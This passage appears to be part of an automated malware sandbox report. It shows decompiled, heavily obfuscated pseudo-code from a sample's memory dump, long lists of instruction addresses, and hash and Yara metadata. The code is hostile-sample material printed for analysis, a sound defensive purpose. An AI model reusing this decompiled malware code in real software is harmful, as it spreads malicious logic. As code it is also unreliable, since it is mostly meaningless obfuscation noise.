						__ah = __ah |  *0x637dfea0;
						__edi = __edi - 1;
						__eax = __edx;
						asm("sbb eax, [0x9fbdd2fd]");
						 *0xff4c1512 =  *0xff4c1512 & __dh;
						__eflags = __esp & 0x5870fd29;
						_push(__eax);
						asm("sbb edi, [0xbc8154d6]");
						__cl = __cl |  *0xd6cb063c;
						__esi =  *0xaa0ba769 * 0x186d;
						__eflags = __al -  *0x27e11184;
						asm("rcl dword [0xa6c457cd], 0x1c");
						 *0x5783bb06 =  *0x5783bb06 ^ __edx;
						__esi = 1 +  *0xaa0ba769 * 0x186d;
						L1();
						__edx = __edx | 0xee2d0ce8;
						__ebp = 0x85c41ade;
						asm("adc ebp, [0x6da27394]");
						__edi = __edi & 0xed077698;
						__ebp = __esp;
						asm("rcl dword [0x4a3e8e11], 0xcd");
						__ecx = __ecx + 1;
						__eflags = __ecx;
						asm("rol dword [0x6140a816], 0xd5");
						if(__ecx < 0) {
							__eflags = __esp & 0x6cc03271;
							__dl = __dl - 0xe2;
							 *0x101951e7 =  *0x101951e7 ^ __al;
							__eflags = __ch & 0x00000084;
							 *0x9de267e7 = __ch;
							asm("lodsb");
							_push(__edi);
							asm("adc bl, 0x10");
							__eflags =  *0x1c11e089 - __esp;
							 *0x870cca3f =  *0x870cca3f ^ __esp;
							 *0x116e531a =  *0x116e531a << 0xa0;
							__eax = __eax & 0x98eb9e1f;
							__esp = __esp ^ 0x68f8086d;
							__bh = __bh | 0x0000001c;
							 *0x874d0c84 =  *0x874d0c84 + __dh;
							__ebp = 0xffffffff95ecdaff;
							_push(__eax);
							asm("sbb [0xa892949f], ebp");
							__cl = __cl +  *0xa674f814;
							__eax =  *0x9ce88969 * 0x2c1d;
							asm("rcr dword [0x208bcc39], 0x71");
							__ebp = 0xffffffff95ecdafe;
							asm("adc ah, [0x3182a810]");
							__ebx = 0xc5caaf0b &  *0x51f62fa3;
							__eflags = 0xc5caaf0b - 0x70f6753b;
							if(0xc5caaf0b >= 0x70f6753b) {
								_pop( *0xcd760278);
								 *0xc8802208 = __cl;
								__edi = __edi &  *0xd891d5bb;
								asm("movsb");
								__eax = __eax & 0x48c958fc;
								 *0xc577948e =  *0xc577948e >> 0x29;
								__esi =  *0x86de1065;
								__eflags =  *0x7144f609 & __esp;
								asm("rcl byte [0xd04f2b04], 0x5");
								__ebx =  *0x60288dea;
								__esi =  *0x86de1065 & 0x34ee4b03;
								 *0xe3d3d28a =  *0xe3d3d28a >> 0x43;
								__esp = __esp ^  *0xe176c864;
								 *0xd5bc8b8d =  *0xd5bc8b8d - __ecx;
								 *0xc848a818 =  *0xc848a818 << 9;
								asm("rcl dword [0x977cdddd], 1");
								__ah = __ah - 0x10;
							}
						}
					}
				}
				while(1) {
					L1:
					asm("ror dword [0x57b1f009], 0x69");
					_t95 = _t95 + 1;
					asm("rol dword [0x3935b90d], 0xf3");
					if((_t50 & 0x0000000a) >= 0) {
						continue;
					}
					L2:
					asm("scasb");
					_t74 =  *0x8a5d6305;
					asm("cmpsb");
					_push( *0xafe8b8c4);
					_t51 = _t50 |  *0x57bf634;
					asm("rcr byte [0x82141b7], 0x16");
					_push(_t78);
					asm("rcl dword [0x21ac910d], 0xe5");
					asm("sbb ch, [0xa3a45ad7]");
					asm("sbb [0xa61356b1], bh");
					_push(_t51);
					_push(_t74 + 0xba0876cf);
					_push( *0x32e74801);
					_t9 = _t78;
					_t78 =  *0x57856a35;
					 *0x57856a35 = _t9;
					asm("rol byte [0x8111ecb6], 0x92");
					 *0x550a0908 =  *0x550a0908 ^ _t51;
					_t73 =  *0xba69866a * 0xff7d;
					_push(_t60);
					_t52 = _t51 & 0x00000008;
					 *0xb6e71d0a = _t60;
					asm("rol byte [0x1761d412], 0x56");
					 *0xf083184 = _t52;
					asm("sbb esp, [0xdb89a2fb]");
					asm("cmpsw");
					asm("ror dword [0xe115810f], 0x13");
					 *0x740acff9 =  *0x740acff9 >> 0xe7;
					_t91 = ( *0x8e77569 * 0x0000da0a |  *0x3491b383) -  *0x830117eb;
					 *0x3b2bb32b =  *0x3b2bb32b - _t78;
					_t60 =  *0x364b2e6a * 0xb469;
					_t50 =  *0x1f7901fa;
					 *0x1f7901fa = _t52 - 1;
					 *0xd2bff8cf =  *0xd2bff8cf << 0;
					_t95 = (0xffffffff93ef5717 +  *0x3080086d |  *0xe34b4d3b) - 0x9ceffbdf;
					 *0xe88f63f7 =  *0xe88f63f7 ^ 0x90f9ad25;
					if( *0xe88f63f7 == 0) {
						while(1) {
							L1:
							asm("ror dword [0x57b1f009], 0x69");
							_t95 = _t95 + 1;
							asm("rol dword [0x3935b90d], 0xf3");
							if((_t50 & 0x0000000a) >= 0) {
								continue;
							}
							goto L2;
							do {
								do {
									do {
										goto L1;
									} while ((_t50 & 0x0000000a) >= 0);
									goto L2;
								} while ( *0xe88f63f7 == 0);
								goto L3;
							} while ( *0x3be3279f > 0);
							 *0x2babc577 =  *0x2babc577 - _t91;
							_t72 = _t72 +  *0x424a9db9;
							_t73 = _t73 + 0x30926d8e;
							 *0xce31028 =  *0xce31028 >> 0xf3;
							 *0xf0c0aff9 =  *0xf0c0aff9 - _t50;
							_t67 =  *0x7c91f760 * 0xaee;
							_push( *0xdc88d5bb);
							_t60 = _t60 & 0x00000063 ^  *0x9808efbb;
							_t78 = _t78 - 1;
							 *0xef44fb8f =  *0xef44fb8f + _t67;
							_pop( *0x6b431bd4);
							 *0xd3664a3b =  *0xd3664a3b + _t60;
							_t50 = _t50 ^  *0x98aa13f9;
							if(_t50 != 0) {
								continue;
							} else {
								asm("sbb ebx, [0xd521607a]");
								 *0xfc4edb89 =  *0xfc4edb89 >> 0xfa;
								asm("rcr dword [0xa6216009], 0x1c");
								_t69 = _t67 - 1;
								 *0xf40b53c0 = _t69;
								_t67 = _t69 ^  *0x86c89b15;
								_t95 = _t73;
								_push(_t50);
								asm("adc ebx, 0xb9213b81");
								_t60 = _t60 + 1;
								 *0xc5516339 =  *0xc5516339 - _t50;
								if( *0xc5516339 == 0) {
									continue;
								} else {
									asm("adc esp, 0xe90ea674");
									 *0xdc9265ee =  *0x1175f627;
									 *0x6bba0e61 = _t50;
									asm("adc edi, [0x9584be31]");
									_pop(_t55);
									asm("movsb");
									return _t55;
								}
							}
						}
					}
					L3:
					asm("adc [0x9c51b074], ecx");
					 *0xae61426 = _t73;
					asm("movsb");
					 *0xdd145d4 =  *0xdd145d4 - _t78;
					asm("adc esi, [0x8ff90139]");
					_t78 = _t78 + 2;
					 *0xb454e0e0 =  *0xb454e0e0 - _t72;
					asm("adc [0xa41e48bb], esi");
					_pop(_t73);
					 *0x493bdb32 =  *0x493bdb32 >> 0x39;
					L1();
					asm("ror dword [0xb221b2e8], 0xc5");
					_t50 = _t50 & 0x0000001c;
					asm("adc ebp, [0x7ac35861]");
					 *0xf7154f3b =  *0xf7154f3b - 0x90f9ad25;
					_t67 = _t67 + 1;
					 *0xa24e3c15 =  *0xa24e3c15 - _t72;
					 *0x3be3279f =  *0x3be3279f & _t60;
					asm("sbb [0x9042f2c2], ebx");
					L1:
					asm("ror dword [0x57b1f009], 0x69");
					_t95 = _t95 + 1;
					asm("rol dword [0x3935b90d], 0xf3");
				}
			}


















                                                                                                                                                    0x0041b973
                                                                                                                                                    0x0041b979
                                                                                                                                                    0x0041b97a
                                                                                                                                                    0x0041b97f
                                                                                                                                                    0x0041b986
                                                                                                                                                    0x0041b98c
                                                                                                                                                    0x0041b993
                                                                                                                                                    0x0041b999
                                                                                                                                                    0x0041b9a1
                                                                                                                                                    0x0041b9a8
                                                                                                                                                    0x0041b9a9
                                                                                                                                                    0x0041b9b5
                                                                                                                                                    0x0041b9b6
                                                                                                                                                    0x0041b9bf
                                                                                                                                                    0x0041b9c5
                                                                                                                                                    0x0041b9cc
                                                                                                                                                    0x0041b9d9
                                                                                                                                                    0x0041b9da
                                                                                                                                                    0x0041b9e1
                                                                                                                                                    0x0041b9e9
                                                                                                                                                    0x0041b9f0
                                                                                                                                                    0x0041b9f6
                                                                                                                                                    0x0041b9f7
                                                                                                                                                    0x0041ba04
                                                                                                                                                    0x0041ba0a
                                                                                                                                                    0x0041ba11
                                                                                                                                                    0x0041ba21
                                                                                                                                                    0x0041ba27
                                                                                                                                                    0x0041ba2d
                                                                                                                                                    0x0041ba33
                                                                                                                                                    0x0041ba36
                                                                                                                                                    0x0041ba3e
                                                                                                                                                    0x0041ba44
                                                                                                                                                    0x0041ba57
                                                                                                                                                    0x0041ba5a
                                                                                                                                                    0x0041ba5b
                                                                                                                                                    0x0041ba61
                                                                                                                                                    0x0041ba6a
                                                                                                                                                    0x0041ba6b
                                                                                                                                                    0x0041ba71
                                                                                                                                                    0x0041ba77
                                                                                                                                                    0x0041ba7d
                                                                                                                                                    0x0041ba83
                                                                                                                                                    0x0041ba8a
                                                                                                                                                    0x0041ba90
                                                                                                                                                    0x0041ba96
                                                                                                                                                    0x0041ba9c
                                                                                                                                                    0x0041baa3
                                                                                                                                                    0x0041baa5
                                                                                                                                                    0x0041baab
                                                                                                                                                    0x0041baac
                                                                                                                                                    0x0041bab2
                                                                                                                                                    0x0041bab3
                                                                                                                                                    0x0041baba
                                                                                                                                                    0x0041babb
                                                                                                                                                    0x0041bac1
                                                                                                                                                    0x0041bac1
                                                                                                                                                    0x0041bac1
                                                                                                                                                    0x0041bac7
                                                                                                                                                    0x0041bacd
                                                                                                                                                    0x0041bad4
                                                                                                                                                    0x0041bada
                                                                                                                                                    0x0041bae0
                                                                                                                                                    0x0041baed
                                                                                                                                                    0x0041baf3
                                                                                                                                                    0x0041baf4
                                                                                                                                                    0x0041bafa
                                                                                                                                                    0x0041bafd
                                                                                                                                                    0x0041bb02
                                                                                                                                                    0x0041bb03
                                                                                                                                                    0x0041bb05
                                                                                                                                                    0x0041bb06
                                                                                                                                                    0x0041bb0c
                                                                                                                                                    0x0041bb0d
                                                                                                                                                    0x0041bb0e
                                                                                                                                                    0x0041bb14
                                                                                                                                                    0x0041bb1a
                                                                                                                                                    0x0041bb20
                                                                                                                                                    0x0041bb21
                                                                                                                                                    0x0041bb27
                                                                                                                                                    0x0041bb2d
                                                                                                                                                    0x0041bb37
                                                                                                                                                    0x0041bb3d
                                                                                                                                                    0x0041bb44
                                                                                                                                                    0x0041bb4b
                                                                                                                                                    0x0041bb4c
                                                                                                                                                    0x0041bb51
                                                                                                                                                    0x0041bb57
                                                                                                                                                    0x0041bb5d
                                                                                                                                                    0x0041bb63
                                                                                                                                                    0x0041bb69
                                                                                                                                                    0x0041bb6a
                                                                                                                                                    0x0041bb71
                                                                                                                                                    0x0041bb71
                                                                                                                                                    0x0041bb72
                                                                                                                                                    0x0041bb79
                                                                                                                                                    0x0041bb7f
                                                                                                                                                    0x0041bb85
                                                                                                                                                    0x0041bb88
                                                                                                                                                    0x0041bb8e
                                                                                                                                                    0x0041bb91
                                                                                                                                                    0x0041bb97
                                                                                                                                                    0x0041bb98
                                                                                                                                                    0x0041bb99
                                                                                                                                                    0x0041bb9c
                                                                                                                                                    0x0041bba2
                                                                                                                                                    0x0041bba8
                                                                                                                                                    0x0041bbaf
                                                                                                                                                    0x0041bbb4
                                                                                                                                                    0x0041bbba
                                                                                                                                                    0x0041bbbd
                                                                                                                                                    0x0041bbc3
                                                                                                                                                    0x0041bbc9
                                                                                                                                                    0x0041bbca
                                                                                                                                                    0x0041bbd0
                                                                                                                                                    0x0041bbd6
                                                                                                                                                    0x0041bbe0
                                                                                                                                                    0x0041bbe7
                                                                                                                                                    0x0041bbe8
                                                                                                                                                    0x0041bbee
                                                                                                                                                    0x0041bbf4
                                                                                                                                                    0x0041bbfa
                                                                                                                                                    0x0041bc00
                                                                                                                                                    0x0041bc06
                                                                                                                                                    0x0041bc0c
                                                                                                                                                    0x0041bc12
                                                                                                                                                    0x0041bc13
                                                                                                                                                    0x0041bc18
                                                                                                                                                    0x0041bc1f
                                                                                                                                                    0x0041bc25
                                                                                                                                                    0x0041bc2b
                                                                                                                                                    0x0041bc32
                                                                                                                                                    0x0041bc38
                                                                                                                                                    0x0041bc3e
                                                                                                                                                    0x0041bc45
                                                                                                                                                    0x0041bc4b
                                                                                                                                                    0x0041bc51
                                                                                                                                                    0x0041bc58
                                                                                                                                                    0x0041bc5e
                                                                                                                                                    0x0041bc5e
                                                                                                                                                    0x0041bbfa
                                                                                                                                                    0x0041bb79
                                                                                                                                                    0x0041bad4
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4bf
                                                                                                                                                    0x0041b4d8
                                                                                                                                                    0x0041b4d9
                                                                                                                                                    0x0041b4da
                                                                                                                                                    0x0041b4e2
                                                                                                                                                    0x0041b4e8
                                                                                                                                                    0x0041b4ee
                                                                                                                                                    0x0041b4f5
                                                                                                                                                    0x0041b4f6
                                                                                                                                                    0x0041b503
                                                                                                                                                    0x0041b509
                                                                                                                                                    0x0041b515
                                                                                                                                                    0x0041b517
                                                                                                                                                    0x0041b534
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b544
                                                                                                                                                    0x0041b54a
                                                                                                                                                    0x0041b551
                                                                                                                                                    0x0041b557
                                                                                                                                                    0x0041b561
                                                                                                                                                    0x0041b57a
                                                                                                                                                    0x0041b57d
                                                                                                                                                    0x0041b583
                                                                                                                                                    0x0041b58a
                                                                                                                                                    0x0041b58f
                                                                                                                                                    0x0041b595
                                                                                                                                                    0x0041b5aa
                                                                                                                                                    0x0041b5b1
                                                                                                                                                    0x0041b5b8
                                                                                                                                                    0x0041b5c3
                                                                                                                                                    0x0041b5c9
                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5d3
                                                                                                                                                    0x0041b5df
                                                                                                                                                    0x0041b5e6
                                                                                                                                                    0x0041b5ec
                                                                                                                                                    0x0041b5f2
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4bd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b666
                                                                                                                                                    0x0041b66c
                                                                                                                                                    0x0041b678
                                                                                                                                                    0x0041b67e
                                                                                                                                                    0x0041b68b
                                                                                                                                                    0x0041b694
                                                                                                                                                    0x0041b69e
                                                                                                                                                    0x0041b6a4
                                                                                                                                                    0x0041b6aa
                                                                                                                                                    0x0041b6ab
                                                                                                                                                    0x0041b6b7
                                                                                                                                                    0x0041b6bd
                                                                                                                                                    0x0041b6c9
                                                                                                                                                    0x0041b6cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b6d5
                                                                                                                                                    0x0041b6d5
                                                                                                                                                    0x0041b6e1
                                                                                                                                                    0x0041b6ee
                                                                                                                                                    0x0041b6f5
                                                                                                                                                    0x0041b6f6
                                                                                                                                                    0x0041b6fc
                                                                                                                                                    0x0041b703
                                                                                                                                                    0x0041b704
                                                                                                                                                    0x0041b70b
                                                                                                                                                    0x0041b711
                                                                                                                                                    0x0041b712
                                                                                                                                                    0x0041b718
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0041b71e
                                                                                                                                                    0x0041b71e
                                                                                                                                                    0x0041b730
                                                                                                                                                    0x0041b736
                                                                                                                                                    0x0041b73c
                                                                                                                                                    0x0041b74f
                                                                                                                                                    0x0041b750
                                                                                                                                                    0x0041b75b
                                                                                                                                                    0x0041b75b
                                                                                                                                                    0x0041b718
                                                                                                                                                    0x0041b6cf
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b5f8
                                                                                                                                                    0x0041b5f8
                                                                                                                                                    0x0041b5fe
                                                                                                                                                    0x0041b604
                                                                                                                                                    0x0041b605
                                                                                                                                                    0x0041b612
                                                                                                                                                    0x0041b618
                                                                                                                                                    0x0041b619
                                                                                                                                                    0x0041b61f
                                                                                                                                                    0x0041b625
                                                                                                                                                    0x0041b626
                                                                                                                                                    0x0041b62d
                                                                                                                                                    0x0041b632
                                                                                                                                                    0x0041b639
                                                                                                                                                    0x0041b63b
                                                                                                                                                    0x0041b641
                                                                                                                                                    0x0041b64d
                                                                                                                                                    0x0041b64e
                                                                                                                                                    0x0041b654
                                                                                                                                                    0x0041b65a
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4a6
                                                                                                                                                    0x0041b4ad
                                                                                                                                                    0x0041b4b6
                                                                                                                                                    0x0041b4b6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e85afe9d0a3f83d0d30308f1902915e454edcde852a2ec0c1fad34278f3be33e
                                                                                                                                                    • Instruction ID: 17a0f89b93eae37d0cd4ebd80b91ab01bbc7ed9a934e197e5ba388a399d4abe5
                                                                                                                                                    • Opcode Fuzzy Hash: e85afe9d0a3f83d0d30308f1902915e454edcde852a2ec0c1fad34278f3be33e
                                                                                                                                                    • Instruction Fuzzy Hash: DCD1A732A18785CFD706DF38D88AB423FB5F742320B08825ED9A2931D2D7742166DF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C8905A, Relevance: .3, Instructions: 283COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c97b809b90f20e98338eeea249f177f75069fe9bcb5ca9d5567db8a4e13108ee
                                                                                                                                                    • Instruction ID: 9970ddbc38e247dc36424411b96b7d26af833b80f93175b9b44264e409dd8fe0
                                                                                                                                                    • Opcode Fuzzy Hash: c97b809b90f20e98338eeea249f177f75069fe9bcb5ca9d5567db8a4e13108ee
                                                                                                                                                    • Instruction Fuzzy Hash: F6B1BD31A042159BDB31EF58CC88BBEB3F4EF44714F08459AE95AE7291D7309E84DB29
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C6E2E9, Relevance: .3, Instructions: 280COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 40af99f804811da275c5f762a24a8f0c9f1621a8664c20d710d0ed667980d2a2
                                                                                                                                                    • Instruction ID: 9231412d56ac0ed20aaf9350a05407c2ba8b58929fe1cc42b2dea989718e1a3a
                                                                                                                                                    • Opcode Fuzzy Hash: 40af99f804811da275c5f762a24a8f0c9f1621a8664c20d710d0ed667980d2a2
                                                                                                                                                    • Instruction Fuzzy Hash: 77C1B375A00619CFDB24CF59C4806ACB7F1FF89324F288269D9659B3D1D734AD42DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00C6E0C6, Relevance: .2, Instructions: 232COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7f268c9d6c0382bb3a4660808c274891154e777b1d1c83cba67f5103300d4c58
                                                                                                                                                    • Instruction ID: 8de32a443f3faecc90ddd12d35171faae08b53ced15869bb55aec8ac3b945c07
                                                                                                                                                    • Opcode Fuzzy Hash: 7f268c9d6c0382bb3a4660808c274891154e777b1d1c83cba67f5103300d4c58
                                                                                                                                                    • Instruction Fuzzy Hash: 9B810171900259DFDF25CF19C884BBE7BB5EF41314F14816AF82A8B282E735DA01EB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041C1FB, Relevance: .2, Instructions: 222COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                    			E0041C1FB(signed int __eax, signed int __ebx, signed int __edx, void* __esi) {
				signed char _t37;
				signed char _t38;
				signed char _t39;
				void* _t42;
				signed int _t44;
				signed int _t48;
				signed int _t50;
				signed char _t53;
				signed int _t54;
				void* _t55;
				signed int _t62;
				void* _t74;
				void* _t79;

				_t48 =  *0xa30d76b7 |  *0xe66b112f;
				_t44 = __ebx | 0x0000001c;
				_t53 = __edx ^ 0x00000082;
				 *0xcdfa6e85 = _t48;
				asm("rcl dword [0x6edb70d9], 0xe");
				_t37 =  *0x9e1e1a9e;
				 *0x9e1e1a9e = __eax |  *0x56c7d1d3;
				asm("movsw");
				_pop(_t79);
				asm("sbb [0x7be94afb], ebp");
				asm("adc ecx, [0x2457920f]");
				_push( *0x27081001);
				_t62 =  *0x92289469 * 0xbd0f;
				 *0x7915ac9 =  *0x7915ac9 << 0xac;
				if( *0x7915ac9 > 0) {
					__ebp =  *0x6a60807e * 0x5ead;
					asm("sbb [0x92305be7], dl");
					__ecx =  *0x74d7b0e;
					if(__ebp >= 0) {
						__edi =  *0xe0d0017c * 0xe4bc;
						asm("sbb ecx, 0xfd7773d4");
						 *0xa5a71b61 =  *0xa5a71b61 & __ebx;
						if( *0xa5a71b61 < 0) {
							__ecx =  *0x36c3ef79;
							__cl = __cl - 0x3a;
							 *0x8937c133 =  *0x8937c133 & __ebx;
							asm("rcr dword [0xcff71485], 0x88");
							if(__ebp >=  *0xb78c78c2) {
								__ebp = __ebp |  *0xafb52b72;
								asm("adc ebx, 0x168cc1f0");
								__edx = __edx - 1;
								asm("sbb ch, [0x7ce067a0]");
								 *0xfa92813f =  *0xfa92813f & __esp;
								 *0xd50550e5 = __al;
								 *0x20e06ef2 =  *0x20e06ef2 ^ __bl;
								 *0xd590e91b = __eax;
								__eax = __eax -  *0x45ce4c6c;
								asm("adc edx, [0xef5f6c8]");
								__cl = __cl &  *0xaf4c6c14;
								_pop(__ebx);
								if(__cl != 0) {
									__eax = __eax &  *0xff4a1874;
									asm("sbb edi, [0xe0bdd0d3]");
									 *0x4c7d20c5 =  *0x4c7d20c5 & __esp;
									__esi = __esi - 1;
									 *0xb00fc717 =  *0xb00fc717 << 0x1d;
									 *0xe851831 = __esi;
									__esi = __esp;
									__ah = __ah & 0x000000a8;
									__esi = __esi;
									asm("sbb dh, 0xe7");
									__ebx = __esi;
									 *0xf17e8e86 =  *0xf17e8e86 >> 0x73;
									__eax =  *0x5d117b31;
									__edi = __edi &  *0xa3bc77ed;
									if(__ecx == 0) {
										_pop( *0xf683575);
										asm("cmpsb");
										asm("sbb dh, [0xe15b1fb5]");
										__esi = __esi -  *0x6462e789;
										asm("lodsb");
										_pop(__esi);
										_pop(__ebx);
										__al = __al +  *0xa50b9230;
									}
								}
							}
						}
					}
				}
				while(1) {
					L1:
					asm("ror dword [0x57b1f009], 0x69");
					_t79 = _t79 + 1;
					asm("rol dword [0x3935b90d], 0xf3");
					if((_t37 & 0x0000000a) >= 0) {
						continue;
					}
					L2:
					asm("scasb");
					_t55 =  *0x8a5d6305;
					asm("cmpsb");
					_push( *0xafe8b8c4);
					_t38 = _t37 |  *0x57bf634;
					asm("rcr byte [0x82141b7], 0x16");
					_push(_t62);
					asm("rcl dword [0x21ac910d], 0xe5");
					asm("sbb ch, [0xa3a45ad7]");
					asm("sbb [0xa61356b1], bh");
					_push(_t38);
					_push(_t55 + 0xba0876cf);
					_push( *0x32e74801);
					_t6 = _t62;
					_t62 =  *0x57856a35;
					 *0x57856a35 = _t6;
					asm("rol byte [0x8111ecb6], 0x92");
					 *0x550a0908 =  *0x550a0908 ^ _t38;
					_t54 =  *0xba69866a * 0xff7d;
					_push(_t44);
					_t39 = _t38 & 0x00000008;
					 *0xb6e71d0a = _t44;
					asm("rol byte [0x1761d412], 0x56");
					 *0xf083184 = _t39;
					asm("sbb esp, [0xdb89a2fb]");
					asm("cmpsw");
					asm("ror dword [0xe115810f], 0x13");
					 *0x740acff9 =  *0x740acff9 >> 0xe7;
					_t74 = ( *0x8e77569 * 0x0000da0a |  *0x3491b383) -  *0x830117eb;
					 *0x3b2bb32b =  *0x3b2bb32b - _t62;
					_t44 =  *0x364b2e6a * 0xb469;
					_t37 =  *0x1f7901fa;
					 *0x1f7901fa = _t39 - 1;
					 *0xd2bff8cf =  *0xd2bff8cf << 0;
					_t79 = (0xffffffff93ef5717 +  *0x3080086d |  *0xe34b4d3b) - 0x9ceffbdf;
					 *0xe88f63f7 =  *0xe88f63f7 ^ 0x90f9ad25;
					if( *0xe88f63f7 == 0) {
						while(1) {
							L1:
							asm("ror dword [0x57b1f009], 0x69");
							_t79 = _t79 + 1;
							asm("rol dword [0x3935b90d], 0xf3");
							if((_t37 & 0x0000000a) >= 0) {
								continue;
							}
							goto L2;
							do {
								do {
									do {
										goto L1;
									} while ((_t37 & 0x0000000a) >= 0);
									goto L2;
								} while ( *0xe88f63f7 == 0);
								goto L3;
							} while ( *0x3be3279f > 0);
							 *0x2babc577 =  *0x2babc577 - _t74;
							_t53 = _t53 +  *0x424a9db9;
							_t54 = _t54 + 0x30926d8e;
							 *0xce31028 =  *0xce31028 >> 0xf3;
							 *0xf0c0aff9 =  *0xf0c0aff9 - _t37;
							_t48 =  *0x7c91f760 * 0xaee;
							_push( *0xdc88d5bb);
							_t44 = _t44 & 0x00000063 ^  *0x9808efbb;
							_t62 = _t62 - 1;
							 *0xef44fb8f =  *0xef44fb8f + _t48;
							_pop( *0x6b431bd4);
							 *0xd3664a3b =  *0xd3664a3b + _t44;
							_t37 = _t37 ^  *0x98aa13f9;
							if(_t37 != 0) {
								continue;
							} else {
								asm("sbb ebx, [0xd521607a]");
								 *0xfc4edb89 =  *0xfc4edb89 >> 0xfa;
								asm("rcr dword [0xa6216009], 0x1c");
								_t50 = _t48 - 1;
								 *0xf40b53c0 = _t50;
								_t48 = _t50 ^  *0x86c89b15;
								_t79 = _t54;
								_push(_t37);
								asm("adc ebx, 0xb9213b81");
								_t44 = _t44 + 1;
								 *0xc5516339 =  *0xc5516339 - _t37;
								if( *0xc5516339 == 0) {
									continue;
								} else {
									asm("adc esp, 0xe90ea674");
									 *0xdc9265ee =  *0x1175f627;
									 *0x6bba0e61 = _t37;
									asm("adc edi, [0x9584be31]");
									_pop(_t42);
